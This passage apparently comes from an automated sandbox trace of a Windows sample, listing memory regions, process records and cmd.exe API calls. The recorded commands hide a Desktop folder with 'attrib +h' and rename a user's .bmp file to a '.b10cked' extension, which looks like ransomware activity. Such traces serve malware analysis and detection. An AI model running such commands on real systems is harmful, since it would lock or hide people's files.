region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33497 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33498 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33499 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33500 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 33501 start_va = 0x4f0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 33502 start_va = 0x71e10000 end_va = 0x71e2cfff entry_point = 0x71e10000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33503 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33504 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33505 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33506 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 33507 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33508 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33509 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33510 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33511 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33512 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33513 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33514 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 33515 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33516 start_va = 0x76ca0000 end_va = 
0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 808 os_tid = 0xdb0 Process: id = "585" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xdc0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "581" os_parent_pid = "0x6bc" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33517 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33518 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33519 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33520 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 33521 start_va = 0xbd0000 end_va = 0xbd6fff entry_point = 0xbd0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 33522 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" 
(normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33523 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33524 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33525 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 33526 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33527 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33528 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33529 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33530 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 33531 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 33532 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 33533 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: 
"c:\\windows\\system32\\kernelbase.dll") Region: id = 33534 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 33535 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33536 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33537 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 33538 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33539 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33540 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33541 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 33542 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename 
= "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33543 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33544 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33545 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33546 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 809 os_tid = 0x5e0 Process: id = "586" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16aa0" os_pid = "0xf50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 33559 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 33560 start_va = 0x30000 end_va = 0x33fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 33561 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 33562 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 33563 start_va = 0x49e00000 end_va = 0x49e4bfff entry_point = 0x49e00000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 33564 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 33565 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 33566 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 33567 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 33568 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 33659 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 33660 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 33661 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 33662 start_va = 0xd0000 end_va = 0xdffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 33663 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 33664 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 33665 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 33666 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 33667 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 33668 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 33669 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 33670 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 33671 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 33672 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 33673 start_va = 0x3a0000 end_va = 0x467fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 33674 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 33675 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 33676 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 33677 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 33678 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 33679 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 33680 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 33681 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 33682 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000001180000" filename = "" Thread: id = 810 os_tid = 0xe28 [0224.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1efccc | out: lpSystemTimeAsFileTime=0x1efccc*(dwLowDateTime=0xb9760060, dwHighDateTime=0x1d440a9)) [0224.495] GetCurrentProcessId () returned 0xf50 [0224.495] GetCurrentThreadId () returned 0xe28 [0224.495] GetTickCount () returned 0x3e0ad [0224.495] QueryPerformanceCounter (in: lpPerformanceCount=0x1efcc4 | out: lpPerformanceCount=0x1efcc4*=28128412940) returned 1 [0224.496] GetModuleHandleA (lpModuleName=0x0) returned 0x49e00000 [0224.496] __set_app_type (_Type=0x1) [0224.496] __p__fmode () returned 0x76b331f4 [0224.496] __p__commode () returned 0x76b331fc [0224.496] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e221a6) returned 0x0 [0224.496] __getmainargs (in: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c, _DoWildCard=0, _StartInfo=0x49e24140 | out: _Argc=0x49e24238, _Argv=0x49e24240, _Env=0x49e2423c) returned 0 [0224.496] GetCurrentThreadId () returned 0xe28 [0224.496] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe28) returned 0x38 [0224.496] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0224.496] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0224.496] SetThreadUILanguage (LangId=0x0) returned 0x409 [0224.496] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0224.496] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1efc5c | out: phkResult=0x1efc5c*=0x0) returned 0x2 [0224.496] VirtualQuery (in: lpAddress=0x1efc93, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0x1ef000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.496] VirtualQuery (in: 
lpAddress=0xf0000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0xf0000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0224.496] VirtualQuery (in: lpAddress=0xf1000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0xf1000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0224.497] VirtualQuery (in: lpAddress=0xf3000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0xf3000, AllocationBase=0xf0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.497] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x1efc2c, dwLength=0x1c | out: lpBuffer=0x1efc2c*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0224.497] GetConsoleOutputCP () returned 0x1b5 [0224.497] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e24260 | out: lpCPInfo=0x49e24260) returned 1 [0224.497] SetConsoleCtrlHandler (HandlerRoutine=0x49e1e72a, Add=1) returned 1 [0224.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0224.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.497] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e241ac | out: lpMode=0x49e241ac) returned 1 [0224.497] _get_osfhandle (_FileHandle=1) returned 0x7 [0224.497] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0224.497] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.497] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e241b0 | out: lpMode=0x49e241b0) returned 1 [0224.498] _get_osfhandle (_FileHandle=0) returned 0x3 [0224.498] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0224.498] GetEnvironmentStringsW () returned 0x2b01a8* [0224.498] FreeEnvironmentStringsW 
(penv=0x2b01a8) returned 1 [0224.498] GetEnvironmentStringsW () returned 0x2b01a8* [0224.498] FreeEnvironmentStringsW (penv=0x2b01a8) returned 1 [0224.498] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebcc | out: phkResult=0x1eebcc*=0x40) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0xd0, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x0, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.498] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x40, 
lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.498] RegCloseKey (hKey=0x40) returned 0x0 [0224.498] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1eebcc | out: phkResult=0x1eebcc*=0x40) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x40, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x1, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x0, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x9, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x4, lpData=0x1eebd8*=0x9, lpcbData=0x1eebd0*=0x4) returned 0x0 [0224.499] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1eebd4, lpData=0x1eebd8, lpcbData=0x1eebd0*=0x1000 | out: lpType=0x1eebd4*=0x0, lpData=0x1eebd8*=0x9, lpcbData=0x1eebd0*=0x1000) returned 0x2 [0224.499] RegCloseKey (hKey=0x40) 
returned 0x0 [0224.499] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b8 [0224.499] srand (_Seed=0x5b8863b8) [0224.499] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"" [0224.499] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1UP3L~1.BMP\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\1up3 l.bmp.b10cked\"" [0224.499] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e25260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0224.499] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2b1908, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0224.500] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0224.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0224.500] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e30640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0224.500] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0224.500] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0224.500] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0224.500] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0224.500] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0224.500] 